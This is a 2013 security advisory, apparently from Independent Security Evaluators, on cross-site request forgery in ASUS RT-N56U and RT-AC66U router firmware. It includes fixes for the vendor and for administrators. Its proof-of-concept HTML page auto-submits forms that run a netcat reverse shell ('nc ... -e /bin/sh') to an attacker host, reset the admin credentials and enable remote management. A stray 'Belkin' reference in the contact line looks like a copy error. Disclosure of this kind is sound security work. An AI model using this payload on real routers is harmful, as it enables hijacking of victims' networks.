Taking over the ASUS RT-N56U and RT-AC66U

[return to summary]

  • The RT-N56U and RT-AC66U can be taken over by a remote adversary through CSRF attack.

Note: The attacks described below affect both the RT-N56U and RT-AC66U, even though the description may only describe one of them.

Description

The ASUS RT-N56U router is susceptible to several CSRF attacks, which allow an attacker to forge HTML forms and execute actions on behalf of a legitimate user. ISE created a proof of concept that when executed by an unsuspecting device administrator, changes the administrator credentials, enables remote management, and grants the attacker a reverse-shell access to the router.

Attack Requirements

  • The victim must have an active management session with the RT-N56U router.
  • The victim must be fooled in to performing an action (e.g., by clicking an attacker provided link), browse to a malicious or compromised site, or be the victim of a man-in-the-middle attack.

Details

  • All HTML forms present in the ASUS RT-N56U are susceptible to Cross-Site Request Forgery.
  • Vulnerable Firmware is 3.0.0.4.342 on the RT-N56U.
  • Vulnerable Firmware is 3.0.0.4.266 on the RT-AC66U.
  • Other versions of firmware were not tested.

Impact

A successful attack exploiting this vulnerability can give a remote adversary full control over the victim router.

Recommendations to the vendor

  • Cross-Site request forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form delivered contain a unique token.
  • In addition to HTML form tokens, HTTP "referer" checking should be enabled.
  • Additional information for vendors regarding immediate and long term fixes for these issues can be found on our summary page here.

Recommendations to device administrators

  • (4/13/2013) There is not currently an available firmware upgrade that will remedy this vulnerability.
  • Take additional preventative measures and precautions by following the steps outlined on our summary page here.

Proof of Concept

In the following proof of concept attack, we assume that an RT-N56U device administrator with an active management session established with the router has browsed to a malicious web page. Once there, automatic form submissions take place to the administrator's router, from the administrator's browser. Since the administrator has a current session established with the router, the form submissions are processed.

The form (Figure 1) is pre-filled out with the information required to change the administrator credentials, and enable remote management.


<html>
<head>
<title> ASUS Multi Model CSRF</title>
<!-- Model: RT-N56U - Firmware Version: 3.0.0.4.342 -->
<!-- Model: RT-AC66U - Firmware Version: 3.0.0.4.266 -->

<!--
# Discovered and Exploited by Jacob Holcomb/Gimppy of 
    Independent Security Evaluators
# http://infosec42.blogspot.com
# https://www.ise.io
-->

</head>

<body>

<!--Execute System Commands -->
<img src="http://192.168.1.1/apply.cgi?current_page=Main_AdmStatus_Content.asp
	&next_page=Main_AdmStatus_Content.asp&action_mode=+Refresh+&action_script=
	&action_wait=&first_time=&preferred_lang=EN
	&SystemCmd=nc+192.168.1.177+10000+-e+/bin/sh&action=Refresh">

<!--Confirm System Command Exec -->
<img src="http://192.168.1.1/Main_AdmStatus_Content.asp">

<form name="ASUS" action="http://192.168.1.1/start_apply.htm" method="post">
<input type="hidden" name="http_username" value="admin"> <!-- Admin Username -->
<input type="hidden" name="http_passwd" value="ISE"> <!--Admin Password  -->
<input type="hidden" name="http_passwd2" value="ISE"> <!--Admin Password  -->
<input type="hidden" name="v_password2" value="ISE">
<input type="hidden" name="telnetd_enable" value="1"> <!--Enable Telnet-LAN Only-->
<input type="hidden" name="misc_http_x" value="1"> <!--Enable HTTP Remote MGMT -->
<input type="hidden" name="misc_httpport_x" value="31337"><!--HTTP Remote MGMT Port-->
<input type="hidden" name="action_mode" value="apply">
</form>

<script>
function CSRF1() {document.ASUS.submit();};
window.setTimeout(CSRF1,1000);
</script>

</body>
</html>

Figure 1. Attack page 1.

At this point, the attacker can remotely administer, and thereby remotely control the ASUS RT-N56U.

References

None.

Credit

  • Discovered By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators
  • Exploited By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators

Contact Information

  • For more information on this particular Belkin hack, you can contact us at routers@www.ise.io
  • Alternatively, for more general information on ISE, you can reach us using contact@www.ise.io